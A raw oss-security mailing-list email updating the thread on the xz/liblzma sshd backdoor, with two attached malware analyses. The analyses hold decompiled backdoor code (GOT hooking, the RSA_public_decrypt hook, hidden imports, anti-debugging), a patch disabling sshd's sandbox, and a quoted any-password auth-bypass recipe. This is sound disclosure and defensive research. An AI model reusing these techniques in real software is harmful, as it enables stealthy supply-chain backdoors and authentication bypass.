Received: by 2002:a05:6500:1b45:b0:1f5:f2ab:c469 with SMTP id cz5csp278836lqb; Tue, 16 Apr 2024 16:00:40 -0700 (PDT) X-Forwarded-Encrypted: i=2; AJvYcCWClGsceEzou9UmDk0Bh8P7ySe65Vp4WuPLwtcOOVdhHtXBoSWtSn3yeFcsiiM/pEuVQNi0NSCHs1WsWKgSyoxxLYkqzwaBaRhoT7yePg== X-Google-Smtp-Source: AGHT+IFe5dwdA1xXj0/sgZwrNi8L5pa33DPz/sbfdOUk3iQnKlYFgPlUKj0/X/X949HlF7JjYI2E X-Received: by 2002:a05:620a:8221:b0:78a:724b:af30 with SMTP id ow33-20020a05620a822100b0078a724baf30mr15310068qkn.24.1713308440593; Tue, 16 Apr 2024 16:00:40 -0700 (PDT) ARC-Seal: i=1; a=rsa-sha256; t=1713308440; cv=none; d=google.com; s=arc-20160816; b=YbDuL8UxogFAxvWWggI/0a6GIyKrVYbhriUPNDP8Vn9MnbB8BaAeUwUpsT9vq1mDmZ RTlRaOIt6q/uyAXzWTbDgnt3Q9r2VZflnFGjOOk1gsHd+tmYKiOW79tp7ODH8HGM5vwq wwqt0+bW/ZC7Lsi0v89M3Rf4734+RJGJB6pOZ81nZpfzqFCBczTmoAgIan+ZJEdfTMRe Hg44o4aVcYGdB6erPGiqV0ityB3QTMrZrYrlqWxX5mte0LL7I0qKqe0jL+0OyW1gRaAq reEmVoqYb2jg0uithZ6sr3pHdKj9KJmzWA2CsZbUMZmHq4kiZJ9SqWPtQ3bXHZKx+CJp 9yLw== ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20160816; h=subject:user-agent:in-reply-to:content-transfer-encoding :content-disposition:mime-version:references:message-id:to:from:date :delivered-to:delivered-to:reply-to:list-id:list-subscribe :list-unsubscribe:list-help:list-post:precedence:mailing-list; bh=9FiM4WXgtI3kW4pVGb9ncRBazhruroOd+7K8TnK2cxQ=; fh=9jsPTyo6edd9xvAeG+KFFrRrXMmgB/RdwUKOrvy9dcA=; b=LFzhuomHFqX3sbq0JxjkpQeAwVFNZT33jss7oiCOqNRbOrQcdurv7T3IpTgwzKfcvq l79enHNdWf1E6lH/gUhaS4rgQuICUWQ8cgyByoO7FApqgkZpwTPbZCDJ973BtyJh0fKy drBGN7EUhmxhlWbYM6ulcNt9McmLUnMn7ms97DGWG9aQSnuheeT+fqcO1aYu1O6RiOag axI3RLDaQy9N5klolTWvv3joauZZ+DplHn6ADb6Ji5nDYN0HkW6dBTI6m7iG87M6kuym sOme1uFoXBT4dGlTr1ejqmHxe8RIKg6ukBohJCGwABo27DVnRzRiLwQDb+Omaf1zb+z3 +PAw==; dara=google.com ARC-Authentication-Results: i=1; mx.google.com; spf=pass (google.com: domain of oss-security-return-30036-linux.lists.archive=gmail.com@lists.openwall.com designates 193.110.157.125 as permitted sender) smtp.mailfrom="oss-security-return-30036-linux.lists.archive=gmail.com@lists.openwall.com" Return-Path: Received: from second.openwall.net (second.openwall.net. [193.110.157.125]) by mx.google.com with SMTP id n19-20020ae9c313000000b0078eeb6bac0dsi4656320qkg.244.2024.04.16.16.00.39 for ; Tue, 16 Apr 2024 16:00:40 -0700 (PDT) Received-SPF: pass (google.com: domain of oss-security-return-30036-linux.lists.archive=gmail.com@lists.openwall.com designates 193.110.157.125 as permitted sender) client-ip=193.110.157.125; Authentication-Results: mx.google.com; spf=pass (google.com: domain of oss-security-return-30036-linux.lists.archive=gmail.com@lists.openwall.com designates 193.110.157.125 as permitted sender) smtp.mailfrom="oss-security-return-30036-linux.lists.archive=gmail.com@lists.openwall.com" Received: (qmail 9273 invoked by uid 550); 16 Apr 2024 23:00:02 -0000 Mailing-List: contact oss-security-help@lists.openwall.com; run by ezmlm Precedence: bulk List-Post: List-Help: List-Unsubscribe: List-Subscribe: List-ID: Reply-To: oss-security@lists.openwall.com Delivered-To: mailing list oss-security@lists.openwall.com Delivered-To: moderator for oss-security@lists.openwall.com Received: (qmail 6039 invoked from network); 16 Apr 2024 22:59:27 -0000 Date: Wed, 17 Apr 2024 00:59:00 +0200 From: Solar Designer To: oss-security@lists.openwall.com Message-ID: <20240416225900.GA23474@openwall.com> References: <20240329155126.kjjfduxw2yrlxgzm@awork3.anarazel.de> <20240331202502.GA21116@openwall.com> Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="ikeVEW9yuYc//A+q" Content-Disposition: inline Content-Transfer-Encoding: 8bit In-Reply-To: <20240331202502.GA21116@openwall.com> User-Agent: Mutt/1.4.2.3i Subject: Re: [oss-security] backdoor in upstream xz/liblzma leading to ssh server compromise --ikeVEW9yuYc//A+q Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Hi, This is an update on some developments in the recent 2 weeks. OpenSSH ======= For upstream OpenSSH, Damien Miller and others have implemented systemd notifications without reliance on libsystemd: Bug 2641 - Add systemd notify code to to track running server https://bugzilla.mindrot.org/show_bug.cgi?id=2641 "Committed as 08f579231cd38 and will be in OpenSSH-9.8, due around June/July." In response to Andres Freund's proposal, Damien also implemented a patch to reduce OpenSSH's attack surface: Bug 3675 - CASignatureAlgorithms should be verified before verifying signatures https://bugzilla.mindrot.org/show_bug.cgi?id=3675 not yet committed? systemd ======= Upstream systemd's libsystemd has been modified to dlopen() many of its dependency libraries on demand: Reduce dependencies of libsystemd #32028 https://github.com/systemd/systemd/issues/32028 The issue above is fixed by pull requests "gcrypt: dlopenify for libsystemd #32019", "Dynamically load compression libraries #31550", "man: document that using sd_journal APIs might cause dlopen to happen and add self-contained notify protocol example #32030", and other related fix-ups. xz backdoor analysis ==================== More findings were made about the backdoor's functionality, notably as published on April 6 by blasty, who discovered that besides triggering system() the backdoor also allows interactive sessions: https://twitter.com/bl4sty/status/1776691497506623562 > the xz sshd backdoor rabbithole goes quite a bit deeper. I was just able > to trigger some harder to reach functionality of the backdoor. there's > still more to explore.. 1/n > Image > it requires sending a properly crafted command to the RSA_public_decrypt > hook, which will then install another for the `mm_answer_keyallowed` > sshd function. subsequently you offer N more fake ssh-rsa pubkeys which > are crafted in a special way to chunk together .. 2/n > a "magic buffer" which contains more backdoor commands, this buffer also > has two additional ed448 signatures. which like the ones for the > RSA_public_decrypt portion of the backdoor are salted with the SHA256 > digest of the hostkey > the final signature also takes into account the session_id (0x20 bytes) > that is derived during the initial key exchange (KEX) for the SSH > session. my current PoC implementation uses a heavily monkey patched > paramiko (ssh client) library to achieve this > currently I'm just triggering command 0x03 in this part of the code, > which allows for a basic RCE through system() again. (also lets you set > uid/gid). but there's more code that needs to be understood. it looks > like a full auth bypass (interactive session) is possible! > (that conclusion is based on the fact that one of the > mm_answer_keyallowed backdoor commands also hooks mm_answer_keyverify, > eventually) > whoever designed this stuff had to take a deep dive into openSSH(d) > internals (and so did I for the past couple of days, oof) .. hats off, > once again :) > auth bypass confirmed! > > > INFO:paramiko.transport:Authentication (password) successful! > > mm_keyallowed_backdoor cmd 1 allows to override the response for > mm_answer_authpassword with a custom one. if you set it to { u32(9), > u8(13), u32(1), u32(0) } you can login with any pass blasty also implemented a "simple SSH Agent that implements some of the XZ sshd backdoor functionality": https://github.com/blasty/JiaTansSSHAgent On Sun, Mar 31, 2024 at 10:25:02PM +0200, Solar Designer wrote: > There's further analysis of the binary payload here: > > https://gist.github.com/smx-smx/a6112d54777845d389bd7126d6e9f504 > > I've attached the gist .md file above (as of "Revisions 52") to this > message, but it's ongoing analysis as seen in the comments. Updates of smx-smx's gist above have stopped at revision 60, which I'm attaching here for archival. Not a lot was added since revision 52. smx-smx also maintains xzre "that is linked against the malicious object file in order to instrument and call into the malware code, particularly the x64 disassembler": https://github.com/smx-smx/xzre and yes, there's a specialized disassembler inside the backdoor code. The friends at Binarly have produced a later but very detailed analysis, which I'm also attaching the main .md file of: https://github.com/binarly-io/binary-risk-intelligence/tree/master/xz-backdoor Other related repos with tools include: xzbot "notes, honeypot, and exploit demo for the xz backdoor (CVE-2024-3094)" https://github.com/amlweems/xzbot xz-min "Minimal setup to trigger the xz backdoor" https://github.com/felipec/xz-min Timeline ======== In an otherwise inappropriate rejected posting, Steffen Nurpmeso wrote: > Russ Cox had a writeup on this https://research.swtch.com/xz-timeline which is a good presentation of the attack timeline, with references to sources and analyses by others. (The beginning of this oss-security thread until April 1st inclusive went through in its entirety - nothing rejected - but I did reject a few postings on April 2nd and on.) OpenJS Foundation "Failed Credible Takeover Attempt" ==================================================== On April 15, the OpenJS and OpenSSF foundations released the following: https://openjsf.org/blog/openssf-openjs-alert-social-engineering-takeovers https://openssf.org/blog/2024/04/15/open-source-security-openssf-and-openjs-foundations-issue-alert-for-social-engineering-takeovers-of-open-source-projects/ I'll quote an excerpt: > The OpenJS Foundation Cross Project Council received a suspicious series > of emails with similar messages, bearing different names and overlapping > GitHub-associated emails. These emails implored OpenJS to take action to > update one of its popular JavaScript projects to "address any critical > vulnerabilities," yet cited no specifics. The email author(s) wanted > OpenJS to designate them as a new maintainer of the project despite > having little prior involvement. This approach bears strong resemblance > to the manner in which "Jia Tan" positioned themselves in the XZ/liblzma > backdoor. > > None of these individuals have been given privileged access to the > OpenJS-hosted project. The project has security policies in place, > including those outlined by the Foundation's security working group. > > The OpenJS team also recognized a similar suspicious pattern in two > other popular JavaScript projects not hosted by its Foundation, and > immediately flagged the potential security concerns to respective OpenJS > leaders, and the Cybersecurity and Infrastructure Security Agency (CISA) > within the United States Department of Homeland Security (DHS). Alexander --ikeVEW9yuYc//A+q Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename="smx-smx-xz-backdoor_analysis.md" ### Discord Room for discussion https://discord.gg/TSD7H8Ww ### Github repository: https://github.com/smx-smx/xzre ##### Init routines - `Llzma_delta_props_decoder` -> `backdoor_ctx_save` - `Llzma_block_param_encoder_0` -> `backdoor_init` - `Llzma_delta_props_encoder` -> `backdoor_init_stage2` ----- ##### Prefix Trie (https://social.hackerspace.pl/@q3k/112184695043115759) - `Llzip_decode_1` -> `table1` - `Lcrc64_clmul_1` -> `table2` - `Llz_stream_decode` -> `count_1_bits` - `Lsimple_coder_update_0` -> `table_get` - Retrieves the index of the encoded string given the plaintext string in memory - `Lcrc_init_0` -> `import_lookup` - `.Lcrc64_generic.0` -> `import_lookup_ex` ----- ##### Anti RE and x64 code Dasm - `Llzma_block_buffer_encode_0` -> `check_software_breakpoint` - `Lx86_code_part_0` -> `code_dasm` - `Llzma_index_iter_rewind_cold` -> `check_return_address` - Checks if the return address has been tampered with. This function is called at the beginning of a "protected" function. If the check fails, the function returns early without doing anything ----- - `Llzma_delta_decoder_init_part_0` -> `backdoor_vtbl_init` - It sets up a vtable with core functions used by the backdoor - `Lstream_decoder_memconfig_part_1` -> `get_lzma_allocator` - `Llzma_simple_props_encode_1` -> `j_tls_get_addr` - `Llzma_block_uncomp_encode_0` -> `rodata_ptr_offset` - `Llzma12_coder_1` -> `global_ctx` ---- ##### ELF parsing - `Llzma_filter_decoder_is_supported.part.0` -> `parse_elf_invoke` - `Lmicrolzma_encoder_init_1` -> `parse_elf_init` - `Lget_literal_price_part_0` -> `parse_elf` - `Llzma_stream_header_encode_part_0` -> `get_ehdr_address` - `Lparse_bcj_0` -> `process_elf_seg` - `Llzma_simple_props_size_part_0` -> `is_gnu_relro` ##### Stealthy ELF magic verification ```c // locate elf header while ( 1 ) { if ( (unsigned int)table_get(ehdr, 0LL) == STR__ELF ) // 0x300 break; // found ehdr -= 64; // backtrack and try again if ( ehdr == start_pointer ) goto not_found; } ``` ---- - `Llzma_stream_flags_compare_1` -> `get_rodata_ptr` ---- ##### Verified or Suspected function hooking - `Llzma_index_memusage_0` -> `apply_entries` - `Llzma_check_init_part_0` -> `apply_one_entry` - `Lrc_read_init_part_0` -> `apply_one_entry_internal` - `Llzma_lzma_optimum_fast_0` -> `install_entries` - `Llzip_decoder_memconfig_part_0` -> `installed_func_0` - `Llzma_index_prealloc_0` -> `RSA_public_decrypt GOT hook/detour` - `Llzma_index_stream_size_1` -> `check_special_rsa_key` -> (thanks [q3k](https://github.com/q3k)) - Called from `Llzma_index_prealloc_0`, it checks if the supplied RSA key is the special key to bypass the normal authentication flow - `Lindex_decode_1` -> `installed_func_2` - `Lindex_encode_1` -> `installed_func_3` - `Llzma2_decoder_end_1` -> `apply_one_entry_ex` - `Llzma2_encoder_init.1` -> `apply_method_1` - `Llzma_memlimit_get_1` -> `apply_method_2` ---- ##### lzma allocator / call hiding ---- - `Lstream_decoder_mt_end_0` -> `get_lzma_allocator_addr` - `Linit_pric_table_part_1` -> `fake_lzma_allocator` - `Lstream_decode_1` -> `fake_lzma_free` ---- ##### core functionality - `Llzma_delta_props_encode_part_0` -> `resolve_imports` (including `system()`) - `Llzma_index_stream_flags_0` -> `process_shared_libraries` - Reads the list of loaded libraries through `_r_debug->r_map`, and calls `process_shared_libraries_map` to traverse it - `Llzma_index_encoder_init_1` -> `process_shared_libraries_map` - Traverses the list of loaded libraries, looking for specific libraries - func @0x7620 : It does indirect calls on the vtable configured by `backdoor_vtbl_init`, and is called by the `RSA_public_decrypt` hook (func#1) upon certain conditions are met Software Breakpoint check, method 1 ----- This method checks if the instruction `endbr64`, which is always present at the beginning of every function in the malware, is overwritten. GDB would typically do this when inserting a software breakpoint ```c /*** address: 0xAB0 ***/ __int64 check_software_breakpoint(_DWORD *code_addr, __int64 a2, int a3) { unsigned int v4; v4 = 0; // [for a3=0xe230], true when *v = 0xfa1e0ff3 (aka endbr64) if ( a2 - code_addr > 3 ) return *code_addr + (a3 | 0x5E20000) == 0xF223;// 5E2E230 return v4; } ``` ---- Function backdoor_init (0xA784) ```c __int64 backdoor_init(rootkit_ctx *ctx, DWORD *prev_got_ptr) { _DWORD *v2; __int64 runtime_offset; bool is_cpuid_got_zero; void *cpuid_got_ptr; __int64 got_value; _QWORD *cpuid_got_ptr_1; ctx->self = ctx; // store data before overwrite backdoor_ctx_save(ctx); ctx->prev_got_ptr = ctx->got_ptr; runtime_offset = ctx->head - ctx->self; ctx->runtime_offset = runtime_offset; is_cpuid_got_zero = (char *)*(&Llzma_block_buffer_decode_0 + 1) + runtime_offset == 0LL; cpuid_got_ptr = (char *)*(&Llzma_block_buffer_decode_0 + 1) + runtime_offset; ctx->got_ptr = cpuid_got_ptr; if ( !is_cpuid_got_zero ) { cpuid_got_ptr_1 = cpuid_got_ptr; got_value = *(QWORD *)cpuid_got_ptr; // replace with Llzma_delta_props_encoder (backdoor_init_stage2) *(QWORD *)cpuid_got_ptr = (char *)*(&Llzma_block_buffer_decode_0 + 2) + runtime_offset; // this calls Llzma_delta_props_encoder due to the GOT overwrite runtime_offset = cpuid((unsigned int)ctx, prev_got_ptr, cpuid_got_ptr, &Llzma_block_buffer_decode_0, v2); // restore original *cpuid_got_ptr_1 = got_value; } return runtime_offset; } ``` ---- ##### Function Name matching (function 0x28C0) ```c str_id = table_get(a6, 0LL); ... if ( str_id == STR_RSA_public_decrypt_ && v11 ) ... else if ( v13 && str_id == STR_EVP_PKEY_set__RSA_ ) ... else if (str_id != STR_RSA_get__key_ || !v17 ) ``` ##### Hidden calls (via `lzma_alloc`) `lzma_alloc` has the following prototype: ```c extern void * lzma_alloc (size_t size , const lzma_allocator * allocator ) ``` The malware implements a custom allocator, which is obtained from `get_lzma_allocator` @ 0x4050 ```c void *get_lzma_allocator() { return get_lzma_allocator_addr() + 8; } char *get_lzma_allocator_addr() { unsigned int i; char *mem; // Llookup_filter_part_0 holds the relative offset of `_Ldecoder_1` - 180h (0xC930) // by adding 0x180, it gets to 0xCAB0 (Lx86_coder_destroy), Since the caller adds +8, we get to 0xCAB8, which is the lzma_allocator itself mem = (char *)Llookup_filter_part_0; for ( i = 0; i <= 0xB; ++i ) mem += 32; return mem; } ``` The interface for `lzma_allocator` can be viewed for example here: https://github.com/frida/xz/blob/e70f5800ab5001c9509d374dbf3e7e6b866c43fe/src/liblzma/api/lzma/base.h#L378-L440 Therefore, the allocator is `Linit_pric_table_part_1` and free is `Lstream_decode_1` - NOTE: the function used for alloc is very likely `import_lookup_ex`, which turns `lzma_alloc` into an import resolution function. this is used a lot in `resolve_imports`, e.g.: ```c system_func = lzma_alloc(STR_system_, lzma_allocator); ctx->system = system_func; if ( system_func ) ++ctx->num_imports; shutdown_func = lzma_alloc(STR_shutdown_, lzma_allocator); ctx->shutdown = shutdown_func; if ( shutdown_func ) ++ctx->num_imports; ``` The third `lzma_allocator` field, `opaque`, is abused to pass information about the loaded ELF file to the "fake allocator" function. This is highlighted quite well by function `Llzma_index_buffer_encode_0`: ```c __int64 Llzma_index_buffer_encode_0(Elf64_Ehdr **p_elf, struct_elf_info *elf_info, struct_ctx *ctx) { _QWORD *lzma_allocator; __int64 result; __int64 fn_read; __int64 fn_errno_location; lzma_allocator = get_lzma_allocator(); result = parse_elf(*p_elf, elf_info); // reads elf into elf_info if ( (_DWORD)result ) { lzma_allocator[2] = elf_info; // set opaque field to the parsed elf info fn_read = lzma_alloc(STR_read_, lzma_allocator); ctx->fn_read = fn_read; if ( fn_read ) ++ctx->num_imports; fn_errno_location = lzma_alloc(STR___errno_location_, lzma_allocator); ctx->fn_errno_location = fn_errno_location; if ( fn_errno_location ) ++ctx->num_imports; return ctx->num_imports == 2; // true if we found both imports } return result; } ``` Note how, instead of `size`, the malware passes an EncodedStringID instead ## Dynamic analysis ### Analyzing the initialization routine 1. Replace the `endbr64` in `get_cpuid` with a `jmp .` ("\xeb\xfe") ```shell root@debian:~# cat /usr/lib/x86_64-linux-gnu/liblzma.so.5.6.1 > liblzma.so.5.6.1 root@debian:~# perl -pe 's/\xF3\x0F\x1E\xFA\x55\x48\x89\xF5\x4C\x89\xCE/\xEB\xFE\x90\x90\x55\x48\x89\xF5\x4C\x89\xCE/g' -i liblzma.so.5.6.1 ``` 2. Force sshd to use the modified library with `LD_PRELOAD` ``` # env -i LC_LANG=C LD_PRELOAD=$PWD/liblzma.so.5.6.1 /usr/sbin/sshd -h ``` NOTE: [anarazel](https://github.com/anarazel) recommends using `LD_LIBRARY_PATH` with a symlink instead, since `LD_PRELOAD` changes the initialization order and could interfere with the normal flow of the malware ### 2b. or use this gdbinit file to do it all at once ```shell # cat gdbinit set confirm off unset env ## comment this out if you don't want to debug the initialization code ## (or use LD_LIBRARY_PATH instead) set env LD_PRELOAD=/root/sshd/liblzma.so.5.6.1 set env LANG=C file /usr/sbin/sshd ## start sshd on port 2022 set args -p 2022 set disassembly-flavor intel set confirm on set startup-with-shell off show env show args # gdb -x gdbinit (gdb) r Starting program: /usr/sbin/sshd -p 222 ^C <-- send CTRL-C Program received signal SIGINT, Interrupt. 0x00007ffff7f8a7f0 in ?? () ``` 3. Attach to the frozen process with your favourite debugger (`gdb attach pid`) ``` (gdb) bt #0 0x00007f8cb3b067f0 in ?? () from /root/sshd/liblzma.so.5.6.1 #1 0x00007f8cb3b08c29 in lzma_crc32 () from /root/sshd/liblzma.so.5.6.1 #2 0x00007f8cb3b4ffab in elf_machine_rela (skip_ifunc=, reloc_addr_arg=0x7f8cb3b3dda0 , version=, sym=0x7f8cb3b03018, reloc=0x7f8cb3b04fc8, scope=0x7f8cb3b3f4f8, map=0x7f8cb3b3f170) at ../sysdeps/x86_64/dl-machine.h:300 #3 elf_dynamic_do_Rela (skip_ifunc=, lazy=, nrelative=, relsize=, reladdr=, scope=, map=0x7f8cb3b3f170) at ./elf/do-rel.h:147 #4 _dl_relocate_object (l=l@entry=0x7f8cb3b3f170, scope=, reloc_mode=, consider_profiling=, consider_profiling@entry=0) at ./elf/dl-reloc.c:301 #5 0x00007f8cb3b5e6e9 in dl_main (phdr=, phnum=, user_entry=, auxv=) at ./elf/rtld.c:2318 #6 0x00007f8cb3b5af0f in _dl_sysdep_start ( start_argptr=start_argptr@entry=0x7ffe17e402e0, dl_main=dl_main@entry=0x7f8cb3b5c900 ) at ../sysdeps/unix/sysv/linux/dl-sysdep.c:140 #7 0x00007f8cb3b5c60c in _dl_start_final (arg=0x7ffe17e402e0) at ./elf/rtld.c:498 #8 _dl_start (arg=0x7ffe17e402e0) at ./elf/rtld.c:585 #9 0x00007f8cb3b5b4d8 in _start () from /lib64/ld-li nux-x86-64.so.2 #10 0x0000000000000002 in ?? () #11 0x00007ffe17e40fa1 in ?? () #12 0x00007ffe17e40fb0 in ?? () #13 0x0000000000000000 in ?? () ``` NOTE: `_get_cpuid` will call function 0xA710, whose purpose is to detect if we're at the right point to initialize the backdoor Why? Because `elf_machine_rela` will call `_get_cpuid` for both `lzma_crc32` and `lzma_crc64`. Since the modified code is part of `lzma_crc64`, 0xA710 has a simple call counter in it to trace how many times it has been called, and make sure the modification doesn't trigger for `lzma_crc32`. - first call (0): -> `lzma_crc32` - second call (1): -> `lzma_crc64` ```c if ( call_counter == 1 ) { /** NOTE: some of these fields are unverified and guessed **/ rootkit_ctx.head = 1LL; memset(&rootkit_ctx.runtime_offset, 0, 32); rootkit_ctx.prev_got_ptr = prev_got_ptr; backdoor_init(&rootkit_ctx, prev_got_ptr); // replace cpuid got entry } ++call_counter; cpuid(a1, &v5, &v6, &v7, &rootkit_ctx); return v5; } ``` At this point, you can issue `detach` and attach with other debuggers if needed. Once attached, set relevant breakpoints and restore the original bytes ("\xF3\x0F\x1E\xFA") ##### breakpoint on RSA_public_decrypt hook Run this gdb script on the sshd listener process (this new gdbinit script should account for eventual differences in library load address - it didn't happen for me in the first tests but it did later on) ``` set pagination off set follow-fork-mode child catch load # now we forked, wait for lzma catch load liblzma c # now we have lzma # 0x12750: offset from base hbreak *(lzma_crc32 - 0x2640 + 0x12750) set disassembly-flavor intel set pagination on c ``` Now connect via https://gist.github.com/keeganryan/a6c22e1045e67c17e88a606dfdf95ae4 ``` ... Thread 3.1 "sshd" hit Breakpoint 1, 0x00007ffff73d1d00 in ?? () from /lib/x86_64-linux-gnu/liblzma.so.5 (gdb) bt #0 0x00007ffff73d1d00 in ?? () from /lib/x86_64-linux-gnu/liblzma.so.5 #1 0x00007ffff73d1ae7 in ?? () from /lib/x86_64-linux-gnu/liblzma.so.5 <-- Llzma_index_prealloc_0 (offset 0x48 in vtable) #2 0x00005555556bdd00 in ?? () #3 0x0000000100000004 in ?? () #4 0x00007fffffffdeb0 in ?? () #5 0x00000001f74b5d7a in ?? () #6 0x0000000000000000 in ?? () ``` ##### RSA_public_decrypt GOT hook (Llzma_index_prealloc_0) ```c /** the following happens during pubkey login **/ params[0] = 1; // should we call original? // this call checks if the supplied RSA key is special result = installed_func_1(rsa_key, global_ctx, params); // if still 1, the payload didn't trigger, call the original function // if 0, bypass validation if ( params[0] ) return real_RSA_public_decrypt(flen, from, to, rsa_key); return result; ``` ### Binary patch for `sshd` to disable seccomp and chroot (allows Frida tracing of `[net]` processes) ```shell > fc /b sshd sshd_patched Comparing files sshd sshd_patched 0001332A: 75 90 0001332B: 6D 90 ---- 0004FC24: 41 C3 0004FC25: 54 90 ---- 00109010: 01 00 ``` - 0001332A: changes the following JMP to not be taken: https://github.com/openssh/openssh-portable/blob/43e7c1c07cf6aae7f4394ca8ae91a3efc46514e2/sshd.c#L448-L449 - 0004FC24: changes the `ssh_sandbox_child` function to be a no-op: https://github.com/openssh/openssh-portable/blob/43e7c1c07cf6aae7f4394ca8ae91a3efc46514e2/sandbox-seccomp-filter.c#L490 - 00109010: changes the default value of `privsep_chroot` from 1 to 0 (probably redundant, since it gets overwritten) --ikeVEW9yuYc//A+q Content-Type: text/plain; charset=utf-8 Content-Disposition: attachment; filename="binarly-xz-backdoor-readme.md" Content-Transfer-Encoding: 8bit # `liblzma.so` infection The process of infecting `liblzma.so` with backdoor code is well documented in [1]. In this document we focus on the backdoor itself and provide an in-depth analysis from both static and dynamic perspectives. ## Entry point As a result of the build time infection as documented in [1], the backdoor hijacks the IFUNC resolvers of `lzma_crc32` and `lzma_crc64` of `liblzma.so`, i.e., `crc32_resolve` and `crc64_resolve`, to add a call to `get_cpuid` in place of an invocation of `cpuid`: ```c crc64_func_type __cdecl crc64_resolve() { // [COLLAPSED LOCAL DECLARATIONS. PRESS NUMPAD "+" TO EXPAND] v7 = __readfsqword(0x28); // malicious function if ( !get_cpuid(1, index, v3, &v4, v5, v6) ) return crc64_generic; v0 = crc64_arch_optimized; if ( (v4 & 0x80202) != 0x80202 ) return crc64_generic; return v0; } ``` This call facilitates the set-up and transition to the backdoor's main functionality. In the remainder of this document we take a deep-dive into the functionality of `get_cpuid`; our analysis is based on the following samples: | File | SHA256 | | ------------------------- | ------------------------------------------------------------------ | | `liblzma.so.5.6.1` | `257fc477b9684863e0822cbad3606d76c039be8dd51cdc13b73e74e93d7b04cc` | | `liblzma_la_crc64_fast.o` | `cbeef92e67bf41ca9c015557d81f39adaba67ca9fb3574139754999030b83537` | ## Installation of the hook for `cpuid` The `get_cpuid` function calls `bd_set_cpuid_hook` function, which then calls `bd_init` if called via `crc64_resolve`: ```c uint64_t __fastcall bd_set_cpuid_hook(unsigned int a1, _DWORD *a2) { // [COLLAPSED LOCAL DECLARATIONS. PRESS NUMPAD "+" TO EXPAND] // crc32_resolve: g_counter will be incremented and // the original cpuid will be invoked // crc64_resolve: hook will be installed if ( g_counter == 1 ) { ctx.static_label = 1; memset(&ctx.runtime_offset, 0, 32); ctx.return_address = a2; bd_init(&ctx, a2); } ++g_counter; cpuid(a1, &res, v4, v5, &ctx); return res; } ``` Note that `g_counter` is shared between `crc32_resolve` and `crc64_resolve`; `crc32_resolve` increments the counter first, then when `crc64_resolve` executes, the check `g_counter == 1` succeeds and the backdoor executes. The pseudocode of `bd_init` function is shown below: ```c uint64_t __fastcall bd_init(bd_hook_ctx *hook_ctx, void *a2) { // [COLLAPSED LOCAL DECLARATIONS. PRESS NUMPAD "+" TO EXPAND] hook_ctx->runtime_label = hook_ctx; bd_hook_ctx_init(hook_ctx); hook_ctx->return_address = hook_ctx->result_ptr; runtime_offset = hook_ctx->static_label - hook_ctx->runtime_label; hook_ctx->runtime_offset = runtime_offset; cpuid_got_ptr_is_null = g_ptrs_table.cpuid_got_ptr + runtime_offset == 0; cpuid_got_ptr = (g_ptrs_table.cpuid_got_ptr + runtime_offset); hook_ctx->result_ptr = cpuid_got_ptr; if ( !cpuid_got_ptr_is_null ) { v7 = cpuid_got_ptr; v6 = *cpuid_got_ptr; // replace cpuid with bd_cpuid_hook *cpuid_got_ptr = g_ptrs_table.bd_cpuid_hook + runtime_offset; // call to bd_cpuid_hook (0x6F60) runtime_offset = cpuid(hook_ctx, a2, cpuid_got_ptr, &g_ptrs_table, index); *v7 = v6; } return runtime_offset; } ``` As we can see, the `cpuid` function pointer in `.got` will be overwritten by with the `bd_cpuid_hook` function pointer and during a the next call to `cpuid`, control will pass to the `bd_cpuid_hook` function. We consider this function as the _real_ entry point of the backdoor. ## Backdoor entry point analysis ```c // backdoor entry point uint64_t __fastcall bd_cpuid_hook(bd_hook_ctx *hook_ctx) { // [COLLAPSED LOCAL DECLARATIONS. PRESS NUMPAD "+" TO EXPAND] // zeromem index = 0x22; table = &ftable; while ( index ) { LODWORD(table->start) = 0; table = (bd_ftable *)((char *)table + 4); --index; } // zeromem current = &input; for ( i = 0x22; i; --i ) { LODWORD(current->start) = 0; current = (install_input *)((char *)current + 4); } lzma_check_init(&input.lzma_check_state, 0);// LZMA_CHECK_NONE status = bd_ftable_init(&ftable); do { if ( !status ) { input.ftable = bd_ftable; input.ctx = ctx; input.hook_ctx = hook_ctx; return bd_install_it_all(&input); } ftable.result = ctx; status = bd_ftable_init(bd_ftable); } while ( status != 5 ); hook_ctx->static_label = 1; hook_ctx->runtime_offset = 0; hook_ctx->result_ptr = 0; hook_ctx->cpuid_ptr = 0; hook_ctx->runtime_label = 0; _RAX = 0; __asm { cpuid } if ( _RAX ) { _RAX = 1; __asm { cpuid } LODWORD(hook_ctx->runtime_offset) = _RAX; LODWORD(hook_ctx->result_ptr) = _RBX; LODWORD(hook_ctx->cpuid_ptr) = _RCX; LODWORD(hook_ctx->runtime_label) = _RDX; } return 0; } ``` This function contains two child functions: - `bd_ftable_init` - performs initialisation of a table of function pointers (`struct bd_ftable`) used for subsequent hooks - `bd_install_it_all` - performs additional set-up logic (structures initialisation, conditions checking, self checking, imports resolution, `_dl_audit_symbind_alt` (`afct`) hook installation, secret_data calculation, etc.) ## `bd_ftable_init` The pseudocode for `bd_ftable_init` function is shown below: ```c uint64_t __fastcall bd_ftable_init(bd_ftable *bd_table) { uint64_t result; // rax result = 5; if ( bd_table ) { bd_table->g_api_ctx = &g_api_ctx; result = 0; if ( !bd_table->result ) { bd_table->value = 4; bd_table->install_hooks = install_hooks; bd_table->RSA_public_decrypt_hook = RSA_public_decrypt_hook; bd_table->RSA_get0_key_hook = RSA_get0_key_hook; bd_table->handle_logging = handle_logging; bd_table->mm_answer_keyallowed_hook = mm_answer_keyallowed_hook; bd_table->change_unknown_to_publickey = change_unknown_to_publickey; return 101; } } return result; } ``` In this function, the backdoor initialises the `bd_ftable` structure which contains several important function pointers, e.g.: - functions used in the hook installation process (`install_hooks`) - hook functions for `openssl::RSA_public_decrypt`, `openssl::RSA_get0_key`, `sshd::mm_answer_keyallowed`, `sshd::mm_log_hander` - and other functions used in the process of backdoor operation We will describe some of these functions later in this report. ## `bd_install_it_all` The pseudocode of the first part of this function is shown below: ```c ... hook_ctx = input->hook_ctx; elf_info_list.sshd_elf_info_p = &sshd_elf_info; elf_info_list.ld_elf_info_p = &ld_elf_info; elf_info_list.libc_elf_info_p = &libc_elf_info; strtab = 0LL; rela_plt_for_RSA_public_decrypt = 0LL; rela_plt_for_EVP_PKEY_set1_RSA = 0LL; rela_plt_for_RSA_get0_key = 0LL; libc_stack_end = 0LL; elf_info_list.liblzma_elf_info_p = &liblzma_elf_info; elf_info_list.libcrypto_elf_info_p = 